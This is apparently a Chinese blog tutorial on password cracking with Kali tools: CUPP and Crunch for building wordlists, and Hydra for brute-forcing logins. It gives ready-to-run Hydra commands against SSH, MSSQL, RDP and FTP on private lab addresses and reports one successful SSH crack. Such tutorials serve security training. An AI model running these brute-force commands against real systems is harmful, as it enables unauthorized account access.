口令破解:kali字典工具的使用:CUPP、Crunch、Hydra

口令破解:

易破解的口令如下:

  • 弱口令:比如12345、00000这种简单的密码
  • 默认口令:服务或者软件自动生成的口令:比如PHPstudy中自动生成MySQL密码为root。
  • 明文传输:HTTP、FTP、Telnet等传输协议。

暴力破解:

  • 在线破解:破解过程中账户需要验证
  • 离线破解:密文还原成明文的过程。

字典生成工具

字典:

  • 弱口令字典:
  • 社工字典:

社工字典cupp:

安装:apt-get install cupp
使用方法 cupp -i即可按照提示步骤生成字典:
在这里插入图片描述
之后就会生成成功
在这里插入图片描述
这是它的提示:
-i 是按照提示步骤实施
-w 是引入字典
-l 是下载网上字典
-a 是来自数据库直接解析密码
在这里插入图片描述

弱口令字典:crunch

kali自带,无需安装。
详细内容见 man crunch

  • 使用方法:crunch <min> <max> [<charset string>] [options]:min和max分别是密码的最小长度和最大长度,后面可以加上字符集和其他选项。
  • 比如crunch 1 8 :输出a~zzzzzzzz所有可能的密码
    在这里插入图片描述

参数;

-b 指定文件输出的大小,避免字典文件过大
-c 指定文件输出的行数,记包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符,即到该字符串就停止生成
-f 调用库文件(/usr/share/crunch/charset.lst)
-i 改变输出格式,即aaa,aab -> aaa,baa
-o 将密码保存到指定文件
-q 读取密码文件,即读取pass.txt
-r 定义重复一个字符串就重新开始
-s 指定一个开始的字符
-t 指定密码输出的格式
-u 禁止打印百分比
-z 压缩生成的字典文件,支持gzip,bzip2,lzma,7z
-l 生成特殊字符
-p 指定生成元素

特殊字符
%代表数字
^代表特殊符号
@代表小写字母
,代表大写字母

样例,来源于man crunch

  • crunch 1 6 abcdefg
    crunch will display a wordlist using the character set abcdefg that starts at a and ends at gggggg
  • crunch 1 6 abcdefg
    there is a space at the end of the character string. In order for crunch to use the space you will need to escape it using the \ character. In this example you could also put quotes around the letters and not need the , i.e. "abcdefg ". Crunch will display a wordlist using the character set abcdefg that starts at a and ends at (6 spaces):从a到6个空格结束
  • crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
    crunch will use the mixalpha-numeric-all-space character set from charset.lst and will write the wordlist to a file named wordlist.txt. The file will start with a and end with " "
  • crunch 4 5 -p abc
    The numbers aren’t processed but are needed.crunch will generate abc, acb, bac, bca, cab, cba.
    等等

口令破解工具hydra

-l 指定一个用户名
-p指定一个密码
-P指定密码字典
-L 指定用户名字典
-vV显示爆破细节
-o保存爆破结果
-f找到正确密码就停止爆破
-e n(null)、s(same)、r(反向)
-e nsr
-t 线程

实例:

破解ssh:hydra -l zeker62 -P pwd.dic 192.168.223.133 ssh -vV -f -e nsr

结果,破解成功:
在这里插入图片描述

据说这个九头蛇啥都可以破解:
参考资料:https://www.cnblogs.com/mchina/archive/2013/01/01/2840815.html

破解MSSQL 口令
hydra -l sa -P /root/dic/test_pwd.dic 192.168.1.150 mssql -vV

破解RDP 口令
hydra -l administrator -P /root/dic/test_pwd.dic 192.168.1.150 rdp -vV

破解FTP 口令
hydra -L /root/dic/test_user.dic -P /root/dic/test_pwd.dic 192.168.1.150 ftp -vV

posted @ 2021-08-12 09:40  Zeker62  阅读(1142)  评论(0编辑  收藏  举报